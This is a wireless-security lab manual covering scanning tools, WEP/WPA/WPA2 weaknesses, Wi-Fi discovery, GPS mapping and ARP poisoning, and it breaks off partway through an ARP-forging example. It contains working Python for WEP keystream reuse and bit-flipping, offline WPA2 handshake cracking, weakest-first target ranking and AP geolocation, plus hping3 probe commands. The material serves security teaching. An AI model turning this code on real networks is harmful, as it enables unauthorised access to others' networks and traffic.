Wireless PDF
LAB MANUAL
CS-702(C): Wireless & Mobile Computing
Lab Plan
Scanning tools are used to identify live hosts, open ports and running services on a target network,
along with location information, NetBIOS information and details of all open TCP and UDP ports. The
information obtained from these tools helps an ethical hacker build a profile of the target organization
and scan the network for open ports on the connected devices.
● Nmap Source: https://nmap.org
Nmap ("Network Mapper") is a security scanner for network exploration and security auditing. It
discovers hosts, ports and services on a computer network, creating a "map" of the network: it sends
specially crafted packets to the target hosts and analyzes the responses. It scales to networks of
hundreds of thousands of machines. Nmap includes many mechanisms for port scanning (TCP and UDP),
OS detection, version detection, ping sweeps, and so on. Either a network administrator or an attacker
can use the tool. Network administrators use Nmap for network inventory, managing service upgrade
schedules, and monitoring host or service uptime. Attackers use Nmap to extract information such as
live hosts on the network, open ports, services (application name and version), the type of packet
filters/firewalls in place, MAC addresses, and OSs along with their versions.
Syntax: # nmap <options> <Target IP address>
● Hping2/Hping3 Source: http://www.hping.org
Hping2/Hping3 is a command-line network scanning and packet-crafting tool for TCP/IP. Like ping it
sends probes and displays the target's replies, but it supports TCP, UDP, ICMP and raw-IP packets
with arbitrary headers, body and size, and it handles fragmentation. It is used for network security
auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting,
remote uptime guessing and TCP/IP stack auditing, and it can transfer files over a covert channel using
any of the supported protocols. It also supports idle host scanning, and with IP spoofing it can probe
a host's services without revealing the attacker's own address. A traceroute mode is available. Hping
can determine whether a host is up even when the host drops ICMP, and its firewalk-like usage reveals
open ports behind firewalls.
Using Hping, an attacker can study the behavior of a host and learn the services it offers, the ports
behind those services, and the target OS. This type of scan is a predecessor to either heavier probing
or outright attacks.
Syntax: # hping3 <options> <Target IP address>
● ICMP Scanning: A ping sweep, or Internet Control Message Protocol (ICMP) scanning, sends an ICMP
echo request (ping) to every host on the network to determine which ones are up. Operating systems,
routers, switches and other IP-based devices use this protocol through the ping command (echo request
and echo reply) as a connectivity test between hosts.
● ICMP ping
Ex. hping3 -1 10.0.0.25
Hping performs an ICMP ping when -1 (or --icmp) is given on the command line. With the above
command, hping sends an ICMP echo request to 10.0.0.25 and reports the ICMP echo reply, much like
the ping utility.
● ACK scan on port 80
Ex. hping3 -A 10.0.0.25 -p 80
Hping performs an ACK scan when -A is given: the ACK flag is set in every probe packet. This scan is
used when a host does not answer a ping request. A host that is up answers an unsolicited ACK with a
RST whether the port is open or closed, so a RST proves only that the host is alive and that the port
is not filtered; no reply at all suggests that a stateful firewall is dropping the probe.
● UDP scan on port 80
Ex. hping3 -2 10.0.0.25 -p 80
Hping uses TCP by default; the argument -2 (or --udp) switches it to UDP mode. A closed UDP port
answers with an ICMP port unreachable message, whereas an open or filtered port usually returns
nothing, so silence alone is not proof that the port is open.
The following table lists the various scanning methods and their respective Hping commands:
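The three hping3 scans above (ICMP ping aside) are only as useful as the interpretation of their replies, and the ACK case is the one most often misread. The following Python is an added example, not code from the lab manual or from hping: it parses reply lines in the format hping3 prints and applies the verdict rules described above for SYN, ACK and UDP probes. The reply lines in SAMPLE_PROBES are constructed to look like hping3 output for one host.

```python
"""Interpreting hping3 replies for SYN, ACK and UDP probes (added example)."""
import re

# e.g. "len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=80 flags=RA seq=0 win=0 rtt=0.4 ms"
TCP_REPLY_RE = re.compile(r"\bip=(?P<ip>[\d.]+).*?\bsport=(?P<sport>\d+)\s+flags=(?P<flags>[A-Z]*)")
# e.g. "ICMP Port Unreachable from ip=10.0.0.25 name=UNKNOWN"
ICMP_UNREACH_RE = re.compile(r"ICMP Port Unreachable from ip=(?P<ip>[\d.]+)")


def classify(mode: str, reply_lines) -> str:
    """Verdict for one probe.

    mode: 'syn' (hping3 -S), 'ack' (hping3 -A) or 'udp' (hping3 -2).
    reply_lines: the hping3 output lines seen for that probe; [] means it timed out.
    """
    if mode not in ("syn", "ack", "udp"):
        raise ValueError(f"unknown probe mode {mode!r}")
    if not reply_lines:
        # Silence means a firewall dropped the probe or the host is down;
        # for UDP it can also mean the port is open, since no reply is required.
        return "open|filtered (no reply)" if mode == "udp" else "filtered (no reply)"
    for line in reply_lines:
        if mode == "udp" and ICMP_UNREACH_RE.search(line):
            return "closed (ICMP port unreachable)"
        m = TCP_REPLY_RE.search(line)
        if not m:
            continue
        flags = set(m.group("flags"))
        if mode == "syn":
            if {"S", "A"} <= flags:
                return "open (SYN/ACK)"
            if "R" in flags:
                return "closed (RST)"
        elif mode == "ack" and "R" in flags:
            # An ACK probe draws a RST from open AND closed ports alike: it proves
            # the host is up and the port is not filtered, nothing more.
            return "unfiltered, host alive (RST)"
    return "unrecognised reply"


# Constructed sample: what an attacker might see for one host, keyed by (mode, port).
SAMPLE_PROBES = {
    ("syn", 22): ["len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=64240 rtt=0.4 ms"],
    ("syn", 23): ["len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=23 flags=RA seq=0 win=0 rtt=0.3 ms"],
    ("ack", 80): ["len=46 ip=10.0.0.25 ttl=64 DF id=0 sport=80 flags=R seq=0 win=0 rtt=0.3 ms"],
    ("ack", 443): [],
    ("udp", 53): [],
    ("udp", 80): ["ICMP Port Unreachable from ip=10.0.0.25 name=UNKNOWN"],
}


def scan_report(probes=SAMPLE_PROBES) -> dict:
    """Map (mode, port) -> verdict for every probe in `probes`."""
    return {(mode, port): classify(mode, lines) for (mode, port), lines in probes.items()}


if __name__ == "__main__":
    for (mode, port), verdict in scan_report().items():
        print(f"{mode:>3} port {port:<4} -> {verdict}")
```

Note that the ACK verdict never says "open": to tell open from closed you need a SYN probe, while the ACK probe's value is in spotting stateful filtering (no reply) versus a simple packet filter that lets ACKs through.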
● Metasploit Source: https://www.metasploit.com
Metasploit is an open-source project that provides the infrastructure, content and tools to perform
penetration tests and extensive security auditing. It provides information about security
vulnerabilities and aids penetration testing and IDS signature development. It supports attackers,
exploit writers and payload writers alike. A major advantage of the framework is its modular approach,
which allows any exploit to be combined with any payload.
It automates discovery and exploitation and supplies the tools needed for the manual testing phase of
a penetration test. Metasploit Pro can scan for open ports and services, exploit vulnerabilities,
pivot further into a network, collect evidence, and create a report of the test results.
● NetScanTools Pro Source: https://www.netscantools.com
NetScanTools Pro is an investigation tool that allows you to troubleshoot, monitor, discover and
detect devices on your network. With it, you can gather information about the local LAN as well as
Internet users, IP addresses, ports, and so on. Attackers use it to find exposed ports and
vulnerabilities in a target system, and to list IPv4/IPv6 addresses, hostnames, domain names, email
addresses and URLs automatically or manually (using its manual tools). NetScanTools Pro combines many
network tools and utilities categorized by function, such as active, passive, DNS and local computer
tools.
PRACTICAL-2
THEORY:-
Wireless encryption protects a wireless network from attackers who try to collect sensitive
information by capturing the RF traffic. This section provides insight into the wireless encryption
standards Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), WPA2 and WPA3, as well as
the weaknesses of WEP, WPA and WPA2.
1) Wired Equivalent Privacy (WEP) Encryption
WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide data
confidentiality on wireless networks at a level equivalent to that of wired LANs, which can rely on
physical security to stop unauthorized access. In a WLAN, a user or an attacker can reach the network
without physically connecting to the LAN, so WEP applies encryption at the data link layer to limit
unauthorized access. It does this with the symmetric Rivest Cipher 4 (RC4) stream cipher.
Role of WEP in Wireless Communication
WEP was developed without any academic or public review; in particular, it was not reviewed by
cryptologists during development, and it has significant vulnerabilities and design flaws. WEP uses
RC4 to produce a keystream that is XORed with the plaintext. The RC4 key is the 24-bit initialization
vector (IV), transmitted in the clear with every frame, concatenated with the shared secret key of
40 bits (64-bit WEP) or 104 bits (128-bit WEP). Because the IV space is small and the same secret is
used for every frame, keystreams repeat, and because the CRC-32 integrity check value (ICV) is linear,
encrypted frames can be modified without detection.
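As an added example (not code from the lab manual), the following Python implements WEP's encapsulation as described above, RC4 keyed with IV || secret and a CRC-32 ICV appended to the payload, and then shows the two classic consequences of that design: a reused IV lets an attacker who knows one frame's plaintext decrypt another frame without the key, and the linear ICV lets the attacker flip chosen plaintext bits without the receiver noticing. The secret key, IV and messages are constructed.

```python
"""WEP encapsulation, keystream reuse and ICV bit-flipping (added example)."""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 (key scheduling + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || ((plaintext || ICV) XOR RC4(IV || secret))."""
    assert len(iv) == 3 and len(secret) in (5, 13), "24-bit IV, 40- or 104-bit key"
    body = plaintext + icv(plaintext)
    return iv + bytes(a ^ b for a, b in zip(body, rc4(iv + secret, len(body))))


def wep_decrypt(secret: bytes, frame: bytes):
    """Return (plaintext, icv_ok) for a frame produced by wep_encrypt."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(a ^ b for a, b in zip(ct, rc4(iv + secret, len(ct))))
    pt = body[:-4]
    return pt, body[-4:] == icv(pt)


def keystream_reuse_attack(known_frame: bytes, known_plaintext: bytes, victim_frame: bytes) -> bytes:
    """Decrypt victim_frame without the key, given another frame with the same IV
    whose plaintext is known. A 24-bit IV repeats within hours on a busy AP, and
    frames such as ARP or DHCP have largely guessable contents."""
    assert known_frame[:3] == victim_frame[:3], "needs an IV collision"
    keystream = bytes(c ^ p for c, p in zip(known_frame[3:], known_plaintext + icv(known_plaintext)))
    recovered = bytes(c ^ k for c, k in zip(victim_frame[3:], keystream))
    # Strip the victim's ICV if the recovered keystream covered its whole body.
    return recovered[:-4] if len(recovered) == len(victim_frame) - 3 else recovered


def bit_flip(frame: bytes, delta: bytes) -> bytes:
    """Change the plaintext by XOR with `delta` without knowing the key. CRC-32 is
    linear, so crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros): XOR the encrypted ICV
    with that correction and the receiver's ICV check still passes."""
    iv, ct = frame[:3], frame[3:]
    assert len(delta) == len(ct) - 4, "delta must cover the plaintext exactly"
    icv_fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))) & 0xFFFFFFFF
    mask = delta + struct.pack("<I", icv_fix)
    return iv + bytes(c ^ m for c, m in zip(ct, mask))


if __name__ == "__main__":
    secret, iv = b"\x01\x02\x03\x04\x05", b"\x0a\x0b\x0c"   # constructed 40-bit key and IV
    f1 = wep_encrypt(secret, iv, b"GET /index.html")
    f2 = wep_encrypt(secret, iv, b"secret: hunter2")       # same IV reused by the AP
    print(keystream_reuse_attack(f1, b"GET /index.html", f2))
    delta = bytes(a ^ b for a, b in zip(b"GET /index.html", b"GET /admin.html"))
    print(wep_decrypt(secret, bit_flip(f1, delta)))
```

Neither attack touches RC4 itself; both follow from using a stream cipher with a short, public IV and a linear checksum, which is why no configuration of WEP key length fixes them.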
2) Wi-Fi Protected Access (WPA) Encryption
Wi-Fi Protected Access (WPA) is a security protocol introduced by the Wi-Fi Alliance as an interim
replacement for WEP, based on a draft of the IEEE 802.11i standard. Previously, the primary security
mechanism between wireless APs and wireless clients was WEP, whose major drawback is a static
encryption key that an attacker can recover with freely available tools. WPA is described as an
expansion of the 802.11 protocols that allows for increased security, and nearly every Wi-Fi
manufacturer supports it.
WPA improves on WEP because every message carries a Message Integrity Check (MIC) computed with the
Michael algorithm, and the Temporal Key Integrity Protocol (TKIP) drives the RC4 stream cipher with
128-bit per-packet keys and a 64-bit MIC. WPA is an example of how 802.11i provides stronger
encryption and supports either pre-shared key (PSK) or EAP authentication. TKIP removes the WEP
weaknesses by adding per-packet key mixing, the MIC, extended (48-bit) IVs and re-keying.
TKIP encapsulation proceeds as follows:
a) The 128-bit temporal key, the transmitter's MAC address and the 48-bit TKIP sequence counter are
combined by a two-phase key-mixing function to generate the per-packet RC4 key: a 24-bit IV plus a
104-bit key, 128 bits in total. RC4 expands this key into a keystream of the same length as the data
to be encrypted.
b) The MAC service data unit (MSDU) and the MIC computed over it with the Michael algorithm are
concatenated.
c) The MSDU plus MIC is fragmented into MAC protocol data units (MPDUs).
d) A 32-bit ICV is calculated for each MPDU, and the MPDU plus ICV is XORed with the keystream to
produce the encrypted data.
e) The IV and extended IV are prepended to the encrypted data to form the MAC frame.
TKIP was a stop-gap for hardware built for WEP; it is deprecated in the 802.11 standard and should not
be enabled on new networks.
3) WPA2 Encryption
Wi-Fi Protected Access 2 (WPA2) is a security protocol used to safeguard wireless networks. WPA2
replaced WPA in 2006, implements the full IEEE 802.11i standard, and supports many security features
that WPA does not. WPA2 introduces the NIST-approved AES encryption algorithm (as used in FIPS 140-2
validated modules), a strong cipher, in the Counter Mode with CBC-MAC Protocol (CCMP), which provides
confidentiality and integrity together. It provides stronger data protection and network access
control than WPA, so that only authorized users can access the network.
Modes of Operation: WPA2 offers two modes of operation.
a) WPA2-Personal: WPA2-Personal uses a password set in advance, the pre-shared key (PSK), to prevent
unauthorized network access. Every device on the network uses the same 256-bit pairwise master key
(PMK) to authenticate with the AP; it is derived from a passphrase of 8 to 63 ASCII characters and the
network SSID with PBKDF2-HMAC-SHA1 (4096 iterations). From that shared key, the 4-way handshake
between each client and the AP derives a fresh per-client pairwise transient key, whose 128-bit
temporal key encrypts that client's traffic with CCMP; these session keys change on every association
and are periodically renewed by rekeying. TKIP plays no part in the key derivation. Because anyone who
knows the passphrase can derive every client's session key from a captured handshake, the strength of
the passphrase is the security of the whole network.
b) WPA2-Enterprise: Instead of a shared passphrase, each user authenticates to an authentication
server through IEEE 802.1X/EAP, and the PMK is issued per user and per session, so one user's
credentials do not expose another user's traffic.
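As an added example (not code from the lab manual), the Python below carries the WPA2-Personal key derivation through: PBKDF2 from passphrase and SSID to the PMK, the PRF-512 expansion to the per-client PTK, and the EAPOL-Key MIC that an attacker who captured the 4-way handshake can recompute for each passphrase guess. The ("password", "IEEE") PMK is the published IEEE 802.11i test vector; the MAC addresses, nonces, EAPOL body and wordlist are constructed.

```python
"""WPA2-Personal key derivation and an offline handshake attack (added example)."""
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """256-bit pairwise master key shared by every device on the network.
    The SSID is the salt, so a table precomputed for one SSID is useless for another."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i), truncated to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Per-client pairwise transient key: KCK = ptk[:16], KEK = ptk[16:32], TK = ptk[32:48]."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for EAPOL-Key descriptor version 2 (HMAC-SHA1-128) over the frame with the MIC field zeroed."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, mic, wordlist):
    """Recover the passphrase offline from a captured handshake. Each guess costs
    4096 HMAC-SHA1 rounds (the PBKDF2 cost) plus one PTK derivation and one MIC."""
    for guess in wordlist:
        if not 8 <= len(guess) <= 63:
            continue  # cannot be a valid WPA2-PSK passphrase
        ptk = wpa2_ptk(wpa2_pmk(guess, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_frame), mic):
            return guess
    return None


def demo(wordlist=("12345678", "letmein1", "short", "password", "Password1")):
    """Constructed capture of message 2 of the handshake for an AP named IEEE
    whose passphrase is the test-vector one; returns what the attack recovers."""
    ssid = "IEEE"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = bytes.fromhex("0203005f") + bytes(95)   # EAPOL-Key frame body zeroed, MIC field included
    legit_ptk = wpa2_ptk(wpa2_pmk("password", ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(legit_ptk[:16], eapol)
    return crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic, wordlist)


if __name__ == "__main__":
    print("PMK(password, IEEE) =", wpa2_pmk("password", "IEEE").hex())
    print("recovered passphrase:", demo())
```

The attacker needs nothing from the AP after capturing one handshake, which is why the defence in WPA2-Personal is passphrase length, not key rotation.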
4) WPA3-Enterprise: This mode builds on WPA2-Enterprise. It offers better security than WPA2 across the
network and protects sensitive data with stronger cryptographic suites. Some of the security protocols
used by WPA3-Enterprise (its 192-bit mode) are described below.
● Key establishment and verification: Cryptographic keys are exchanged between the two parties using
Elliptic Curve Diffie–Hellman (ECDH) key exchange and the Elliptic Curve Digital Signature Algorithm
(ECDSA) over a 384-bit elliptic curve.
The first steps of the wireless hacking methodology are:
● Wi-Fi discovery
● GPS mapping
1. Wi-Fi Discovery: The first step is to find a Wi-Fi network or device. An attacker performs Wi-Fi
discovery to locate a target wireless network using tools such as inSSIDer Plus, NetSurveyor, etc.
Wi-Fi discovery procedures include footprinting the wireless networks and finding an appropriate
target network within range to launch an attack.
● Wi-Fi Chalking Techniques
WarWalking: Attackers walk around with Wi-Fi-enabled laptops running a wireless discovery tool to
map out open wireless networks.
WarChalking: Symbols are drawn in public places to advertise open Wi-Fi networks.
Options of the wash command (the WPS scanner from the Reaver toolkit):
-a, --all: display all access points, including those with WPS disabled
-f, --file [FILE1 FILE2 FILE3 ...]: read packets from captured files
-n, --probes=<num>: maximum number of probes to send to each AP in scan mode
-D, --daemonize: daemonize wash
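What the discovery tools listed in this practical do, stripped to its core, is turn scan results into a ranked list of targets. The Python below is an added example (not code from the lab manual or any tool it lists): it parses the per-BSS text that the Linux `iw dev wlan0 scan` command prints, derives each network's security mode from the capability bits and the RSN/WPA/WPS elements, and sorts the weakest networks first. SAMPLE_SCAN is a constructed scan of four networks in the format iw uses.

```python
"""Wi-Fi discovery: parse `iw dev wlan0 scan` output and rank weak networks (added example)."""
import re

SAMPLE_SCAN = """\
BSS 00:11:22:33:44:55(on wlan0)
\tsignal: -42.00 dBm
\tcapability: ESS Privacy (0x0411)
\tSSID: CorpNet
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: IEEE 802.1X
\tDS Parameter set: channel 6
BSS 66:77:88:99:aa:bb(on wlan0)
\tsignal: -70.00 dBm
\tcapability: ESS (0x0401)
\tSSID: Free Internet
\tDS Parameter set: channel 11
BSS cc:dd:ee:ff:00:11(on wlan0)
\tsignal: -55.00 dBm
\tcapability: ESS Privacy (0x0411)
\tSSID: HomeWifi
\tRSN:\t * Version: 1
\t\t * Pairwise ciphers: CCMP TKIP
\t\t * Authentication suites: PSK
\tWPS:\t * Version: 1.0
\tDS Parameter set: channel 1
BSS 12:34:56:78:9a:bc(on wlan0)
\tsignal: -80.00 dBm
\tcapability: ESS Privacy (0x0411)
\tSSID: LegacyPrinter
\tDS Parameter set: channel 6
"""


def parse_iw_scan(text):
    """One dict per BSS with the fields the classifier needs."""
    nets, cur = [], None
    for raw in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", raw)
        if m:
            cur = {"bssid": m.group(1), "ssid": "", "channel": None, "signal": None, "privacy": False,
                   "rsn": False, "wpa": False, "wps": False, "auth": set(), "ciphers": set()}
            nets.append(cur)
            continue
        if cur is None:
            continue
        s = raw.strip()
        if s.startswith("SSID:"):
            cur["ssid"] = s[5:].strip()
        elif s.startswith("signal:"):
            cur["signal"] = float(s.split()[1])
        elif s.startswith("DS Parameter set: channel"):
            cur["channel"] = int(s.rsplit(" ", 1)[1])
        elif s.startswith("capability:"):
            cur["privacy"] = " Privacy" in s       # Privacy bit: WEP or WPA/WPA2/WPA3 in use
        elif s.startswith(("RSN:", "WPA:", "WPS:")):
            cur[s[:3].lower()] = True
        elif "Authentication suites:" in s:
            cur["auth"].update(s.split(":", 1)[1].split())
        elif "cipher" in s:
            cur["ciphers"].update(s.split(":", 1)[1].split())
    return nets


def security_class(net):
    if not net["privacy"]:
        return "open"
    if not (net["rsn"] or net["wpa"]):
        return "WEP"                                # Privacy bit set, no RSN/WPA element
    if "SAE" in net["auth"]:
        return "WPA3-Personal"
    gen = "WPA2" if net["rsn"] else "WPA"
    if "802.1X" in net["auth"]:
        return gen + "-Enterprise"
    return gen + "-Personal" if "PSK" in net["auth"] else gen


def discovery_report(text):
    """Networks sorted weakest first (then by strongest signal), each with its reasons."""
    rows = []
    for net in parse_iw_scan(text):
        cls = security_class(net)
        weak = []
        if cls == "open":
            weak.append("no encryption")
        elif cls == "WEP":
            weak.append("WEP key recoverable from traffic")
        if "TKIP" in net["ciphers"]:
            weak.append("TKIP enabled")
        if net["wps"]:
            weak.append("WPS enabled (PIN brute force)")
        rows.append({"ssid": net["ssid"], "bssid": net["bssid"], "channel": net["channel"],
                     "signal_dbm": net["signal"], "security": cls, "weaknesses": weak})
    return sorted(rows, key=lambda r: (-len(r["weaknesses"]), -(r["signal_dbm"] or -100)))
```

The same classification is what wash reports when it filters for WPS: a WPA2-Personal network with WPS configured is a weaker target than its cipher suite suggests.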
Theory:-
1. inSSIDer Plus Source: https://www.metageek.com
inSSIDer Plus is a Wi-Fi optimization and troubleshooting tool that scans for wireless networks with
the user's Wi-Fi adapter so that the user can visualize their signal strengths and the channels they
use. It also lists useful information about each network. Attackers use inSSIDer Plus to discover
Wi-Fi access points and devices in their vicinity.
Features:
o Inspects the WLAN and surrounding networks to troubleshoot competing APs
o Tracks received signal strength in dBm over time and filters APs
o Highlights APs in areas with high Wi-Fi concentration
o Exports Wi-Fi and GPS data to a KML file for viewing in Google Earth
o Shows overlapping Wi-Fi network channels
2. NetSurveyor Source: http://nutsaboutnets.com
NetSurveyor is an 802.11 network discovery tool that gathers information about nearby wireless APs in
real time and displays it in different diagnostic views and charts. Data can be recorded for extended
periods and played back later. NetSurveyor also generates reports in Adobe PDF format. Attackers use
NetSurveyor to discover Wi-Fi networks, local APs, and the signal strengths of their beacons.
The following are some of the additional Wi-Fi discovery tools:
a. Wi-Fi Scanner (https://lizardsystems.com)
b. Acrylic Wi-Fi Home (https://www.acrylicwifi.com)
c. WirelessMon (https://www.passmark.com)
d. Ekahau HeatMapper (https://www.ekahau.com)
1. WiFi Analyzer Source: https://play.google.com
WiFi Analyzer is a Wi-Fi network optimization tool used to examine surrounding Wi-Fi networks,
measure their signal strengths, and identify crowded channels. Attackers use WiFi Analyzer to detect
nearby APs, graph the signal strengths of channels, estimate distances to APs, etc.
The following are some of the additional mobile-based Wi-Fi discovery tools:
● OpenSignalMaps (https://opensignal.com)
● Network Signal Info Pro (http://www.kaibits-software.com)
● WiFi Manager (https://kmansoft.com)
● Network Signal Info & WiFi Refresher (https://play.google.com)
● WiFi Scanner (https://play.google.com)
PRACTICAL-5
AIM:-GPS Mapping.
Theory :- The second step in the wireless hacking methodology is GPS mapping. An attacker who has
discovered a target wireless network proceeds by drawing a map of the network, using automated tools to
plot the target wireless network.
The Global Positioning System (GPS) is a space-based satellite navigation system that provides the
location of physical entities on Earth, along with the time at which they were at that location. With
a GPS utility, anyone can find a specific location on Earth and its geographical features, and an
attacker uses it to locate and map the target wireless network within a geographical area. A GPS
receiver calculates position, time and velocity by processing specially coded satellite signals.
Attackers know that free Wi-Fi networks in an area may indicate unsecured networks. They usually build
maps of discovered Wi-Fi networks and a database of statistics collected with Wi-Fi discovery tools
such as inSSIDer Office and NetSurveyor. GPS is used to record the location of each discovered Wi-Fi
network, and the coordinates are uploaded to sites such as WiGLE. Attackers can share such
information with the hacking community or sell it for profit.
1. WiGLE Source: https://wigle.net
WiGLE consolidates information on wireless networks worldwide, including their locations, in a central
database, and provides user-friendly Java, Windows and web applications that can map, query and update
the database via the web. A wireless network can be added to WiGLE from a stumble file or manually, and
remarks can be added to existing networks. The location of discovered Wi-Fi networks can be tracked
using WiGLE through the following steps.
o Navigate to https://wigle.net and click on Uploads.
o On the Uploads page, click on UPLOAD A FILE to upload a log file.
2. Maptitude Mapping Software Source: https://www.caliper.com
With Maptitude mapping software and a GPS receiver, attackers can track a victim's location from a
portable computer, collect field data, and create new or updated geographic files that mark map
features. In detail, Maptitude Mapping Software allows attackers to do the following:
o Track the location of a GPS receiver on a map
o Log GPS data
o Import GPS playback data from a handheld GPS
o Locate points by coordinate or by longitude/latitude
o Choose markers, pushpins and custom icons for locations
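The mapping step comes down to one computation: turning a walk's worth of GPS-tagged signal readings into a position for each AP, and then exporting it in a form a map viewer understands. The Python below is an added example (not code from the lab manual, WiGLE or Maptitude). It groups samples by BSSID, estimates each AP's position as a signal-weighted centroid of the fixes, and writes a KML document that opens in Google Earth (the format inSSIDer exports to). SAMPLE_LOG is constructed.

```python
"""Locate discovered APs from GPS-tagged scan samples and export KML (added example)."""
import xml.etree.ElementTree as ET

# (bssid, ssid, latitude, longitude, rssi_dbm), constructed as if recorded while
# walking north along one street past two access points.
SAMPLE_LOG = [
    ("00:11:22:33:44:55", "CorpNet", 40.0000, -74.0000, -80),
    ("00:11:22:33:44:55", "CorpNet", 40.0005, -74.0000, -50),
    ("00:11:22:33:44:55", "CorpNet", 40.0010, -74.0000, -80),
    ("66:77:88:99:aa:bb", "Free Internet", 40.0010, -74.0000, -85),
    ("66:77:88:99:aa:bb", "Free Internet", 40.0020, -74.0000, -60),
]


def estimate_position(samples):
    """Signal-weighted centroid of the fixes. Each fix is weighted by received
    power in milliwatts (10**(dBm/10)), so a -50 dBm reading counts 1000x more
    than a -80 dBm one and pulls the estimate toward where the AP really is."""
    wsum = lat = lon = 0.0
    for la, lo, rssi in samples:
        w = 10 ** (rssi / 10)
        wsum += w
        lat += w * la
        lon += w * lo
    return lat / wsum, lon / wsum


def map_networks(log):
    """Group samples by BSSID and estimate each AP's position and best RSSI."""
    by_bssid = {}
    for bssid, ssid, la, lo, rssi in log:
        rec = by_bssid.setdefault(bssid, {"ssid": ssid, "samples": [], "best_rssi": -200})
        rec["samples"].append((la, lo, rssi))
        rec["best_rssi"] = max(rec["best_rssi"], rssi)
    for rec in by_bssid.values():
        rec["lat"], rec["lon"] = estimate_position(rec["samples"])
    return by_bssid


def to_kml(networks) -> str:
    """One KML Placemark per AP. KML coordinates are written as lon,lat,alt."""
    kml = ET.Element("kml", xmlns="http://www.opengis.net/kml/2.2")
    doc = ET.SubElement(kml, "Document")
    for bssid, rec in networks.items():
        pm = ET.SubElement(doc, "Placemark")
        ET.SubElement(pm, "name").text = rec["ssid"]
        ET.SubElement(pm, "description").text = f"{bssid} best RSSI {rec['best_rssi']} dBm"
        point = ET.SubElement(pm, "Point")
        ET.SubElement(point, "coordinates").text = f"{rec['lon']:.6f},{rec['lat']:.6f},0"
    return ET.tostring(kml, encoding="unicode")


if __name__ == "__main__":
    print(to_kml(map_networks(SAMPLE_LOG)))
```

A weighted centroid is biased toward the path walked, so an AP on only one side of a street is placed nearer the street than it is; more samples from different directions tighten the estimate.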
THEORY:- ARP resolves the MAC address of a host, such as an AP, from its IP address. ARP has no
mechanism to verify that a response comes from the legitimate host, and ARP poisoning is an attack
technique that exploits this lack of verification: the ARP cache maintained by the OS is corrupted with
wrong MAC addresses. An attacker achieves this by sending forged ARP reply packets that bind a
victim's IP address (typically the gateway's) to the attacker's MAC address. An ARP poisoning attack
affects all hosts in a subnet. All stations associated with an affected subnet are vulnerable because
most APs act as transparent MAC-layer bridges, and all hosts connected to a switch or hub are
susceptible if the AP is connected directly to that switch or hub without a router/firewall between
them. The figure below illustrates the process of an ARP poisoning attack.
● Launch the ettercap graphical interface and enable unified sniffing by selecting Sniff > Unified
Sniffing from the menu bar. Unified sniffing captures every packet on a single interface and is the
mode used for ARP poisoning.
● In the ettercap Input pop-up window, set the network interface to sniff and click OK. This reveals
the advanced menu options such as Targets, Hosts, MITM and Plugins, from which the attacker selects
the victim and gateway as targets and starts ARP poisoning under the MITM menu.
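ettercap hides the packet it actually sends, so the following Python is an added example (not code from the lab manual or from ettercap) that builds the exact bytes of the forged ARP reply a poisoner emits, parses them back, and runs a small arpwatch-style detector over a constructed sequence of frames to show how the attack looks on the wire. Sending such a frame needs a raw socket and root, which this example deliberately does not do.

```python
"""Forging an ARP reply and detecting ARP cache poisoning (added example)."""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply. A poisoner puts the gateway's IP in
    sender_ip and its own MAC in sender_mac; the victim's OS caches that binding."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
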